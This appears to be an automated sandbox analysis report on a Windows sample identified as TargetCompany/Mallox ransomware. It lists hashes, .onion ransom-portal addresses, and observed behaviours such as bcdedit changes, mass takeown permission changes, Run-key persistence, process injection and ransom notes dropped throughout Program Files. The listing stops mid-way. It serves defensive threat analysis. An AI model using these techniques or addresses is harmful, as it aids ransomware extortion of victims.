Analysis
-
max time kernel
104s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
20-03-2024 10:59
Static task
static1
Behavioral task
behavioral1
Sample
fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe
Resource
win10v2004-20240226-en
General
-
Target
fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe
-
Size
971KB
-
MD5
8bb54aaed2117ea1e335444375aa113c
-
SHA1
e04cd1c0df50f44e369b3e8f16aa7f5a3aedd330
-
SHA256
fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc
-
SHA512
379ea13ff1070baedc72f2c18789af55e56243dc340b8c6a26ba19c559e59c8a79d37291d8f5838de0b64233b66f02e875ced5dda9fba1e411e03b0eaa92ce5f
-
SSDEEP
24576:bL9SB7iMphWNaOhroNLvCYKxhj954HZLLZd2zvGH26CIQx0G:bLa7i6WNFhroNLvLKxFDiZLL2GH23N9
Malware Config
Extracted
C:\Users\Admin\Contacts\HOW TO BACK FILES.txt
targetcompany
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral2/memory/1216-1-0x0000015B6B090000-0x0000015B6B152000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-4-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-5-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-7-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-9-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-11-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-13-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-15-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-17-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-19-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-21-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-23-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-25-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-27-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-29-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-35-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-37-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-39-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-33-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-31-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-41-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-43-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-45-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-47-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-49-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-51-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-53-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-59-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-61-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-63-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-57-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-55-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-67-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 behavioral2/memory/1216-65-0x0000015B6B090000-0x0000015B6B14C000-memory.dmp family_zgrat_v1 -
TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4924 bcdedit.exe 2080 bcdedit.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe -
Modifies file permissions 1 TTPs 18 IoCs
pid Process 4068 takeown.exe 3692 takeown.exe 2832 takeown.exe 3564 takeown.exe 2936 takeown.exe 4884 takeown.exe 1900 takeown.exe 3896 takeown.exe 3652 takeown.exe 4188 takeown.exe 4352 takeown.exe 3952 takeown.exe 3404 takeown.exe 2032 takeown.exe 4856 takeown.exe 2040 takeown.exe 3944 takeown.exe 3900 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yuhei = "C:\\Users\\Admin\\AppData\\Roaming\\Yuhei.exe" fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\R: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\V: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\B: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\J: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\P: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\Y: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\G: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\H: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\U: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\O: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\W: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\Z: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\D: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\E: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\M: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\L: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\N: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\S: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\T: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\X: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\A: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\I: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened (read-only) \??\K: fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1216 set thread context of 2756 1216 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe 136 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\EnsoUI\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ar-ae\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.MSPaint_2019.729.2301.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleAppAssets\Videos\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\identity_proxy\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.People_2019.305.632.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.513.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.2.2_2.2.27328.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\edge_feedback\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Windows Media Player\ja-JP\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\ko\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\sw-KE\View3d\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\HelpAndFeedback\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\nl-nl\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\VideoLAN\VLC\locale\it\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\MovedPackages\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\az-Latn-AZ\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\ImmersiveVideoPlayback\Content\Shaders\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\fr\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Java\jre-1.8\lib\jfr\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Java\jre-1.8\lib\security\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\lt\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe File created C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\Assets\HOW TO BACK FILES.txt fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1216 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 4856 takeown.exe Token: SeTakeOwnershipPrivilege 2040 takeown.exe Token: SeTakeOwnershipPrivilege 3944 takeown.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeDebugPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 3652 takeown.exe Token: SeTakeOwnershipPrivilege 2936 takeown.exe Token: SeTakeOwnershipPrivilege 4884 takeown.exe Token: SeTakeOwnershipPrivilege 4188 takeown.exe Token: SeTakeOwnershipPrivilege 1900 takeown.exe Token: SeTakeOwnershipPrivilege 4068 takeown.exe Token: SeTakeOwnershipPrivilege 3896 takeown.exe Token: SeTakeOwnershipPrivilege 3692 takeown.exe Token: SeTakeOwnershipPrivilege 4352 takeown.exe Token: SeTakeOwnershipPrivilege 3952 takeown.exe Token: SeTakeOwnershipPrivilege 3404 takeown.exe Token: SeTakeOwnershipPrivilege 2032 takeown.exe Token: SeTakeOwnershipPrivilege 2832 takeown.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 2756 fd2babde5ef8b417cd3ee03db2149633728585ba4a70919fb6f516dc59c23fbc.exe Token: SeTakeOwnershipPrivilege 